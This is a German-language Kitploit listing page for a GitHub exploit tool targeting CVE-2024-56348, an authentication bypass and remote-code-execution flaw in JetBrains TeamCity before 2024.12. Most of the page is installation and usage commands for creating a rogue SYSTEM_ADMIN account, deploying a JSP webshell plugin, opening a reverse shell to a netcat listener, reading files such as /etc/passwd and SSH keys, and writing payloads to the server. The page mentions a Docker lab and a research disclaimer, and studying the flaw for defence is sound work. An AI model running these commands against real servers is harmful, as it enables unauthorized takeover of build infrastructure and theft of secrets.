Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-56348 — CVE-2024-56348 — JetBrains TeamCity <2024.12 Auth-Bypass + RCE-Exploit (nicht authentifizierter SYSTEM_ADMIN + Shell) | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/cve-2024-56348
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed TeamingRemote-Access-Tool
GitHubjoshuavanderpoll/cve-2024-56348

cve-2024-56348

CVE-2024-56348 — JetBrains TeamCity <2024.12 Auth-Bypass + RCE-Exploit (nicht authentifizierter SYSTEM_ADMIN + Shell)

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

JetBrains TeamCity Authentifizierungs-Bypass + RCE (CVE-2024-56348) PoC

Go

📜 Beschreibung

CVE-2024-56348 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in JetBrains TeamCity on-premises, die alle Versionen vor 2024.12 betrifft. Die REST-API verarbeitet Anfragen an Pfade, die ;.jsp enthalten, fehlerhaft, wodurch ein nicht authentifizierter Angreifer jeden REST-Endpunkt aufrufen kann, als wäre er vollständig authentifiziert.

Dieser Exploit kombiniert den Bypass mit der eigenen REST-API von TeamCity, um ein SYSTEM_ADMIN-Konto zu erstellen, ein API-Token zu generieren und vollständige Remote-Codeausführung zu erreichen – entweder über den integrierten Debug-Endpunkt oder über eine dynamisch hochgeladene JSP-Plugin-Webshell. Es sind keine Anmeldedaten erforderlich.

Betroffene Versionen: JetBrains TeamCity on-premises < 2024.12

✨ Funktionen

  • Interaktive Shell — Pseudo-Shell mit stdout/stderr-Trennung und Exit-Code in der Eingabeaufforderung
  • Befehlsausführung — einzelner Befehl über -command mit vollständiger stdout-, stderr- und Exit-Code-Ausgabe
  • Reverse Shell — stellt eine JSP-Plugin-Webshell bereit und löst einen Callback an Ihren Listener aus
  • Datei lesen — jede Datei lesen, auf die der TeamCity-Prozess zugreifen kann
  • Datei schreiben — beliebigen Inhalt in jeden beschreibbaren Pfad auf dem Server schreiben

🛠️ Installation

root@kitploit:~
git clone https://github.com/joshuavanderpoll/cve-2024-56348.git
cd CVE-2024-56348
go build -o exp cve-2024-56348.go

Direkt mit Go installieren

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2024-56348@latest

Ohne Installation ausführen

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2024-56348@latest -t http://127.0.0.1:8111

⚙️ Verwendung

root@kitploit:~
  -t          Target URL  (e.g. http://127.0.0.1:8111)
  -command    Execute a single command and print output
  -shell      Spawn a reverse shell (requires -lhost and -lport)
  -lhost      Listener host for the reverse shell
  -lport      Listener port for the reverse shell
  -read-file  Read a remote file and print its contents
  -write-file Remote path to write to (requires -file-content)
  -file-content Content to write when using -write-file

Ohne Aktionsflag wird automatisch eine interaktive Shell gestartet.


Schwachstellenprüfung + interaktive Shell

Verbindet sich mit dem Ziel, bestätigt den Bypass, erstellt ein temporäres Administratorkonto und startet eine interaktive Shell. Die Eingabeaufforderung zeigt den Exit-Code des letzten Befehls in Grün (Erfolg) oder Rot (ungleich Null).

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111

Interaktive Shell


Einzelne Befehlsausführung

Führt einen einzelnen Befehl aus und gibt stdout, stderr und Exit-Code getrennt aus.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -command "id"

Befehlsausführung


Reverse Shell

Stellt die JSP-Plugin-Webshell bereit und löst eine Reverse Shell zurück zu Ihrem Listener aus. Starten Sie zuerst nc -lvp 4444.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -shell -lhost 10.0.0.1 -lport 4444

Reverse Shell


Datei lesen

Liest jede Datei, auf die der TeamCity-Prozess Zugriff hat — nützlich für Konfigurationsdateien, SSH-Schlüssel usw.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -read-file /etc/passwd

Datei lesen


Datei schreiben

Schreibt beliebigen Inhalt in einen entfernten Pfad. Nützlich zum Ablegen zusätzlicher Payloads oder zum Ändern der Konfiguration.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -write-file /tmp/readme.txt -file-content "LEAVE ME HERE"

Datei schreiben


🐋 Docker-PoC

Eine eigenständige Docker-Compose-Umgebung mit einer verwundbaren TeamCity-Instanz für lokale Tests. Weitere Details finden Sie in DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
./cve-2024-56348 -t http://127.0.0.1:8111

Falls das Skript "[-] Plugin upload failed." zurückgibt, versuchen Sie, sich mit dem Benutzer hackindex anzumelden, und versuchen Sie es erneut. (Anmeldedaten finden Sie in DOCKER.md)

🕵🏼 Referenzen

  • JetBrains Security Advisory — CVE-2024-56348
  • NVD — CVE-2024-56348
  • HackIndex

📢 Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen